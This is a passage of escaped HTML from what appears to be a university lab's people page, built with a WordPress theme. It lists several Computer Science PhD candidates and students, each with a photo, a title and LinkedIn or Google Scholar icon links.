data-colibri-id=\"182-c74\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c74 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-854 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\" class=\"wp-image-1742 style-854-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-902 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-855 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-849 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-901 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-853 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-856 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-852 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-857 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassani</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=9KRgkCcAAAAJ&amp;hl=en&amp;oi=ao\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 